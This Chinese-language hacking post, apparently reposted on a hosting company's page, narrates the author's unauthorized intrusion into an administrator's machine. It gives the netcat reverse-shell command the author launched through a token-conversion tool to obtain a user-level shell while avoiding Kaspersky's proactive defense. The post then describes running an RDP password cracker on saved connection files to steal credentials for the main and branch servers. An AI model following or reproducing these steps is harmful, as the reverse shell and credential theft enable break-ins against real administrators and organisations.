將系統(tǒng)權(quán)限轉(zhuǎn)換為用戶權(quán)限

幾天前費(fèi)了不少力氣拿到一管理員機(jī)器，主站我盤旋了很久，沒有突破口，開了80，還有一個高端端口，當(dāng)然就是3389了，一陣欣喜，管理員一定會登這個服務(wù)器的3389的。
     現(xiàn)在機(jī)器是拿到了，翻了翻管理員機(jī)器里的東西，本來想裝鍵盤記錄的，發(fā)現(xiàn)有很多以ip命名的rdp文件，下了一個下回來打開看了一下，真幸運(yùn)，保存了密碼在rdp文件里的（這種情況只有讀rdp的密碼了，鍵盤記錄記不到）。主站和各分站的3389都是以保存密碼登錄的，上傳一個讀取rdp密碼的東西就可以讀到密碼了，但這時(shí)遇到一個很頭痛的問題，我的馬是系統(tǒng)權(quán)限的馬，讀取rdp文件的密碼必須要在用戶權(quán)限下。想裝一個用戶權(quán)限的馬上去，可手里沒好馬，管理員機(jī)器上裝了個卡巴斯基，還開了主動防御。試著折騰了一下，裝其它的馬，都被主動防御攔截，管理員還似乎有點(diǎn)發(fā)覺，開始檢查機(jī)器，幸好這個馬還穩(wěn)當(dāng)，先斷開連接。
     接下來仔細(xì)想了一下，到底咋搞呢，必須要得到一個用戶權(quán)限的shell，再上傳馬上去執(zhí)行就不敢了，搞不好把現(xiàn)在的這個權(quán)限都弄掉。
     最后想起一個令牌轉(zhuǎn)換的東西，試了一下直接用令牌轉(zhuǎn)換工具運(yùn)行rdpcrk.exe 加參數(shù)重定向到文本，結(jié)果沒讀取成功。于是就想到用nc通過令牌轉(zhuǎn)換彈一個用戶權(quán)限的shell回來。
在馬里面執(zhí)行cmd：change.exe  c:\windows\nc.exe xx.xx.xx.xx 123 -e cmd.exe
在本地臨聽123端口，接到shell后，傳個東西上去，whoami,呵呵，終于得到一個用戶權(quán)限的shell。
然后rdpcrk.exe  xx.xx.xx.xx.rdp
成功得到密碼，直登服務(wù)器，搞定。

億恩科技地址(ADD)：鄭州市黃河路129號天一大廈608室 郵編(ZIP)：450008 傳真(FAX)：0371-60123888
   聯(lián)系：億恩小凡
   QQ：89317007
   電話:0371-63322206

服務(wù)器租用/服務(wù)器托管中國五強(qiáng)！虛擬主機(jī)域名注冊頂級提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]